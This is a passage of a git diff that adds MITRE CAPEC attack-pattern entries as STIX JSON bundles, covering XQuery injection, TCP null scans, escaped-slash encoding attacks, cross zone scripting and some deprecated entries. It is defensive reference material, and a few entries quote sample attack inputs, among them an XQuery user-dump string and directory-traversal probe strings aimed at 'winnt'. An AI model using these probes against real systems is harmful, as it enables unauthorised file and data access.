"url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/680.html", + "external_id": "CWE-680" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + }, + { + "source_name": "reference_from_CAPEC", + "description": "scut, team teso, Exploiting Format String Vulnerabilities", + "url": "http://doc.bughunter.net/format-string/exploit-fs.html", + "external_id": "REF-503" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Halvar Flake, Auditing binaries for security vulnerabilities", + "url": "http://www.blackhat.com/presentations/bh-europe-00/HalvarFlake/HalvarFlake.ppt", + "external_id": "REF-504" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Fortify Taxonomy of Vulnerabilities, Fortify Software", + "url": "https://vulncat.hpefod.com/en", + "external_id": "REF-505" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Syslog man page", + "url": "http://www.rt.com/man/syslog.3.html", + "external_id": "REF-506" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Unreliable Execution" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_example_instances": [ + "Format string vulnerability in TraceEvent function for ntop before 2.1 allows remote attackers to execute arbitrary code by causing format strings to be injected into calls to the syslog function, via (1) an HTTP GET request, (2) a user name in HTTP authentication, or (3) a password in HTTP authentication. See also: CVE-2002-0412" + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The format string argument of the Syslog function can be tainted with user supplied data." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20.json b/capec/attack-pattern/attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20.json new file mode 100644 index 0000000000..1e6c1a3680 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20.json @@ -0,0 +1,75 @@ +{ + "type": "bundle", + "id": "bundle--27e5449d-9ed1-4efb-b35a-bb962609d244", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--540d669a-0e46-435c-8cc3-99bf7526ba20", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "XQuery Injection", + "description": "This attack utilizes XQuery to probe and attack server systems; in a similar manner that SQL Injection allows an attacker to exploit SQL calls to RDBMS, XQuery Injection uses improperly validated data that is passed to XQuery commands to traverse and execute commands that the XQuery routines have access to. XQuery injection can be used to enumerate elements on the victim's environment, inject commands to the local host, or execute queries to remote files and data sources.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/84.html", + "external_id": "CAPEC-84" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/713.html", + "external_id": "CWE-713" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n An attacker can pass XQuery expressions embedded in otherwise standard XML documents. Like SQL injection attacks, the attacker tunnels through the application entry point to target the resource access layer. The string below is an example of an attacker accessing the accounts.xml to request the service provider send all user names back.\n doc(accounts.xml)//user[Name='*']\n The attacks that are possible through XQuery are difficult to predict, if the data is not validated prior to executing the XQL.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The XQL must execute unvalidated data" + ], + "x_capec_skills_required": { + "Low": "Basic understanding of XQuery" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--548e2d51-d404-4f6f-8b25-356f78cf822c.json b/capec/attack-pattern/attack-pattern--548e2d51-d404-4f6f-8b25-356f78cf822c.json new file mode 100644 index 0000000000..86fa0398a3 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--548e2d51-d404-4f6f-8b25-356f78cf822c.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--099b2a1a-c255-4d1e-b568-70ba284edf3e", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--548e2d51-d404-4f6f-8b25-356f78cf822c", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "DEPRECATED: Passively Sniffing and Capturing Application Code Bound for an Authorized Client During Patching", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-65 : Sniff Application Code\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/259.html", + "external_id": "CAPEC-259" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--54d223de-6dd1-4f76-af5c-6d59b78b915a.json b/capec/attack-pattern/attack-pattern--54d223de-6dd1-4f76-af5c-6d59b78b915a.json new file mode 100644 index 0000000000..b8c4bd0390 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--54d223de-6dd1-4f76-af5c-6d59b78b915a.json @@ -0,0 +1,52 @@ +{ + "type": "bundle", + "id": "bundle--0b8b4d1d-cc80-40dd-a1cd-8b0ba2f13c1d", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--54d223de-6dd1-4f76-af5c-6d59b78b915a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Data Injected During Configuration", + "description": "An attacker with access to data files and processes on a victim's system injects malicious data into critical operational data during configuration or recalibration, causing the victim's system to perform in a suboptimal manner that benefits the adversary.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/536.html", + "external_id": "CAPEC-536" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/284.html", + "external_id": "CWE-284" + }, + { + "source_name": "reference_from_CAPEC", + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf", + "external_id": "REF-439" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_example_instances": [ + "An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim's system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have previously compromised the victim's systems or have physical access to the victim's systems.", + "Advanced knowledge of software and hardware capabilities of a manufacturer's product." + ], + "x_capec_skills_required": { + "High": "Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5538fa30-63bf-475f-b0c1-7132e1a97672.json b/capec/attack-pattern/attack-pattern--5538fa30-63bf-475f-b0c1-7132e1a97672.json new file mode 100644 index 0000000000..47d32099ec --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5538fa30-63bf-475f-b0c1-7132e1a97672.json @@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--c7d433a4-a682-49cc-9360-0262f68dd0e1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5538fa30-63bf-475f-b0c1-7132e1a97672", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2014-06-23T00:00:00.000Z", + "name": "Application Fingerprinting", + "description": "An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/541.html", + "external_id": "CAPEC-541" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--55548c08-54c5-4e9c-af66-e432938987b1.json b/capec/attack-pattern/attack-pattern--55548c08-54c5-4e9c-af66-e432938987b1.json new file mode 100644 index 0000000000..3d63bd4484 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--55548c08-54c5-4e9c-af66-e432938987b1.json @@ -0,0 +1,78 @@ +{ + "type": "bundle", + "id": "bundle--dc1ae40f-23a0-4621-8f80-d9c7a3539861", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--55548c08-54c5-4e9c-af66-e432938987b1", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "TCP Null Scan", + "description": "An adversary uses a TCP NULL scan to determine if ports are closed on the target machine. This scan type is accomplished by sending TCP segments with no flags in the packet header, generating packets that are illegal based on RFC 793. The RFC 793 expected behavior is that any TCP segment with an out-of-state Flag sent to an open port is discarded, whereas segments with out-of-state flags sent to closed ports should be handled with a RST in response. This behavior should allow an attacker to scan for closed ports by sending certain types of rule-breaking packets (out of sync or disallowed by the TCB) and detect closed ports via RST packets. In addition to being fast, the major advantage of this scan type is its ability to scan through stateless firewall or ACL filters. Such filters are configured to block access to ports usually by preventing SYN packets, thus stopping any attempt to 'build' a connection. NULL packets, like out-of-state FIN or ACK packets, tend to pass through such devices undetected. Many operating systems, however, do not implement RFC 793 exactly and for this reason NULL scans do not work as expected against these devices. Some operating systems, like Microsoft Windows, send a RST packet in response to any out-of-sync (or malformed) TCP segments received by a listening socket (rather than dropping the packet via RFC 793), thus preventing an attacker from distinguishing between open and closed ports. NULL scans are limited by the range of platforms against which they work. Additionally, because open ports are inferred via no responses being generated, one cannot distinguish an open port from a filtered port without further analysis. For instance, NULL scanning a system protected by a stateful firewall may indicate all ports being open. Because of their obvious rule-breaking nature, NULL scans are flagged by almost all intrusion prevention or intrusion detection systems.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/304.html", + "external_id": "CAPEC-304" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html", + "external_id": "CWE-200" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill", + "external_id": "REF-33" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)", + "url": "http://www.faqs.org/rfcs/rfc793.html", + "external_id": "REF-128" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC, ISBN: 978-0-9799587-1-7", + "external_id": "REF-34" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997", + "url": "http://phrack.org/issues/51/11.html", + "external_id": "REF-130" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_prerequisites": [ + "The adversary requires logical access to the target network. NULL scanning requires the use of raw sockets, and thus cannot be performed from some Windows systems (Windows XP SP 2, for example). On Unix and Linux, raw socket manipulations require root privileges." + ], + "x_capec_resources_required": [ + "This attack can be carried out via a network mapper/scanner, or via raw socket programming in a scripting language. Packet injection tools are also useful for this purpose. Depending upon the method used it may be necessary to sniff the network in order to see the response." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--555b8083-e5c3-458b-ab0b-e6a8e91ef149.json b/capec/attack-pattern/attack-pattern--555b8083-e5c3-458b-ab0b-e6a8e91ef149.json new file mode 100644 index 0000000000..4d826ad0b1 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--555b8083-e5c3-458b-ab0b-e6a8e91ef149.json @@ -0,0 +1,66 @@ +{ + "type": "bundle", + "id": "bundle--f902b0a9-0e9a-4e6d-8a90-3afd1108b5e1", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--555b8083-e5c3-458b-ab0b-e6a8e91ef149", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-04-04T00:00:00.000Z", + "name": "Harvesting Information via API Event Monitoring", + "description": "An adversary hosts an event within an application framework and then monitors the data exchanged during the course of the event for the purpose of harvesting any important data leaked during the transactions. One example could be harvesting lists of usernames or userIDs for the purpose of sending spam messages to those users. One example of this type of attack involves the adversary creating an event within the sub-application. Assume the adversary hosts a \"virtual sale\" of rare items. As other users enter the event, the attacker records via MITM proxy the user_ids and usernames of everyone who attends. The adversary would then be able to spam those users within the application using an automated script.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/383.html", + "external_id": "CAPEC-383" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/311.html", + "external_id": "CWE-311" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/319.html", + "external_id": "CWE-319" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/419.html", + "external_id": "CWE-419" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/602.html", + "external_id": "CWE-602" + }, + { + "source_name": "reference_from_CAPEC", + "description": "Tom Stracener, Sean Barnum, So Many Ways [...]: Exploiting Facebook and YoVille, 2010, Defcon 18", + "external_id": "REF-327" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (The adversary is able to gather information to potentially support further nefarious activities.)" + ] + }, + "x_capec_prerequisites": [ + "The target software is utilizing application framework APIs" + ], + "x_capec_resources_required": [ + "" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--556e35d3-137d-4102-b2e6-ba28a05736cd.json b/capec/attack-pattern/attack-pattern--556e35d3-137d-4102-b2e6-ba28a05736cd.json new file mode 100644 index 0000000000..de2c7500b5 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--556e35d3-137d-4102-b2e6-ba28a05736cd.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--83484c73-1b87-4bad-9112-9ca6f59536ad", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--556e35d3-137d-4102-b2e6-ba28a05736cd", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2019-09-30T00:00:00.000Z", + "name": "DEPRECATED: Violating Implicit Assumptions Regarding XML Content (aka XML Denial of Service (XDoS))", + "description": "This attack pattern has been deprecated as it a generalization of CAPEC-230: XML Nested Payloads, CAPEC-231: XML Oversized Payloads, and CAPEC-147: XML Ping of Death. Please refer to these CAPECs going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/82.html", + "external_id": "CAPEC-82" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--559dc460-3811-474c-89d7-7b0987d96cea.json b/capec/attack-pattern/attack-pattern--559dc460-3811-474c-89d7-7b0987d96cea.json new file mode 100644 index 0000000000..3d80b366a4 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--559dc460-3811-474c-89d7-7b0987d96cea.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--d89d9498-7058-41dd-ad78-71fbf46d1894", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--559dc460-3811-474c-89d7-7b0987d96cea", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-05-01T00:00:00.000Z", + "name": "DEPRECATED: Code Injection", + "description": "This attack pattern has been deprecated as it is a duplicate of the existing attack pattern \"CAPEC-242 : Code Injection\". Please refer to this other CAPEC going forward.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/241.html", + "external_id": "CAPEC-241" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Meta", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a.json b/capec/attack-pattern/attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a.json new file mode 100644 index 0000000000..f525592b1b --- /dev/null +++ b/capec/attack-pattern/attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a.json @@ -0,0 +1,128 @@ +{ + "type": "bundle", + "id": "bundle--396baa0b-f15f-429c-8af6-99a41bec2e7f", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--55a94435-46dc-4467-ac11-8cb1db296a9a", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Using Escaped Slashes in Alternate Encoding", + "description": "This attack targets the use of the backslash in alternate encoding. An attacker can provide a backslash as a leading character and causes a parser to believe that the next character is special. This is called an escape. By using that trick, the attacker tries to exploit alternate ways to encode the same character which leads to filter problems and opens avenues to attack.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/78.html", + "external_id": "CAPEC-78" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/180.html", + "external_id": "CWE-180" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/181.html", + "external_id": "CWE-181" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/173.html", + "external_id": "CWE-173" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/171.html", + "external_id": "CWE-171" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/172.html", + "external_id": "CWE-172" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/73.html", + "external_id": "CWE-73" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/21.html", + "external_id": "CWE-21" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/22.html", + "external_id": "CWE-22" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html", + "external_id": "CWE-74" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html", + "external_id": "CWE-697" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html", + "external_id": "CWE-707" + }, + { + "source_name": "reference_from_CAPEC", + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Detailed", + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Bypass Protection Mechanism" + ], + "Availability": [ + "Resource Consumption (Denial of Service)", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "\n For example, the byte pair \\0 might result in a single zero byte (a NULL) being sent. Another example is \\t, which is sometimes converted into a tab character. There is often an equivalent encoding between the back slash and the escaped back slash. This means that \\/ results in a single forward slash. A single forward slash also results in a single forward slash. The encoding looks like this:\n / yields /\\/ yields /\n ", + "\n Attack Example: Escaped Slashes in Alternate Encodings\n An attack leveraging this pattern is very simple. If you believe the target may be filtering the slash, attempt to supply \\/ and see what happens. Example command strings to try out include\n CWD ..\\/..\\/..\\/..\\/winnt\n which converts in many cases to\n CWD ../../../../winnt\n To probe for this kind of problem, a small C program that uses string output routines can be very useful. File system calls make excellent testing fodder. The simple snippet\n int main(int argc, char* argv[]){puts(\"\\/ \\\\ \\? \\. \\| \");return 0;\n }\n produces the output\n / \\ ? . |\n Clearly, the back slash is ignored, and thus we have hit on a number of alternative encodings to experiment with. Given our previous example, we can extend the attack to include other possibilities:\n CWD ..\\?\\?\\?\\?\\/..\\/..\\/..\\/winntCWD \\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/winntCWD ..\\|\\|\\|\\|\\/..\\/..\\/..\\/winnt\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "The application accepts the backlash character as escape character.", + "The application server does incomplete input data decoding, filtering and validation." + ], + "x_capec_skills_required": { + "Low": "The attacker can naively try backslash character and discover that the target host uses it as escape character.", + "Medium": "The attacker may need deep understanding of the host target in order to exploit the vulnerability. The attacker may also use automated tools to probe for this vulnerability." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--55b82059-4ab2-436b-a092-ff26c0f4443b.json b/capec/attack-pattern/attack-pattern--55b82059-4ab2-436b-a092-ff26c0f4443b.json new file mode 100644 index 0000000000..9cf5edcd07 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--55b82059-4ab2-436b-a092-ff26c0f4443b.json @@ -0,0 +1,29 @@ +{ + "type": "bundle", + "id": "bundle--0b587be6-a66a-4e29-998e-94e15126be75", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--55b82059-4ab2-436b-a092-ff26c0f4443b", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2018-07-31T00:00:00.000Z", + "name": "DEPRECATED: TCP/IP Fingerprinting Probes", + "description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the standard level pattern CAPEC-312 : Active OS Fingerprinting going forward, or to any of the detailed patterns that are children of CAPEC-312.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/315.html", + "external_id": "CAPEC-315" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.2" + } + ] +} \ No newline at end of file diff --git a/capec/attack-pattern/attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57.json b/capec/attack-pattern/attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57.json new file mode 100644 index 0000000000..0d2f7b4b65 --- /dev/null +++ b/capec/attack-pattern/attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57.json @@ -0,0 +1,88 @@ +{ + "type": "bundle", + "id": "bundle--8e1f0013-385a-4de8-adb9-3114b8785c24", + "spec_version": "2.0", + "objects": [ + { + "type": "attack-pattern", + "id": "attack-pattern--5869bbce-1e2f-4f18-b5f0-34cc2fcc9b57", + "created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322", + "created": "2014-06-23T00:00:00.000Z", + "modified": "2017-08-04T00:00:00.000Z", + "name": "Cross Zone Scripting", + "description": "An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security. In a zone-based model, pages belong to one of a set of zones corresponding to the level of privilege assigned to that page. Pages in an untrusted zone would have a lesser level of access to the system and/or be restricted in the types of executable content it was allowed to invoke. In a cross-zone scripting attack, a page that should be assigned to a less privileged zone is granted the privileges of a more trusted zone. This can be accomplished by exploiting bugs in the browser, exploiting incorrect configuration in the zone controls, through a cross-site scripting attack that causes the attackers' content to be treated as coming from a more trusted page, or by leveraging some piece of system functionality that is accessible from both the trusted and less trusted zone. This attack differs from \"Restful Privilege Escalation\" in that the latter correlates to the inadequate securing of RESTful access methods (such as HTTP DELETE) on the server, while cross-zone scripting attacks the concept of security zones as implemented by a browser.", + "external_references": [ + { + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/104.html", + "external_id": "CAPEC-104" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/250.html", + "external_id": "CWE-250" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/638.html", + "external_id": "CWE-638" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/285.html", + "external_id": "CWE-285" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/116.html", + "external_id": "CWE-116" + }, + { + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html", + "external_id": "CWE-20" + } + ], + "object_marking_refs": [ + "marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89" + ], + "x_capec_abstraction": "Standard", + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_example_instances": [ + "There was a cross zone scripting vulnerability discovered in Skype that allowed one user to upload a video with a maliciously crafted title that contains a script. Subsequently, when the victim attempts to use the \"add video to chat\" feature on attacker's video, the script embedded in the title of the video runs with local zone privileges. Skype is using IE web controls to render internal and external HTML pages. \"Add video to chat\" uses these web controls and they are running in the Local Zone. Any user who searched for the video in Skype with the same keywords as in the title field, would have the attackers' code executing in their browser with local zone privileges to their host machine (e.g. applications on the victim's host system could be executed)." + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The target must be using a zone-aware browser." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Ability to craft malicious scripts or find them 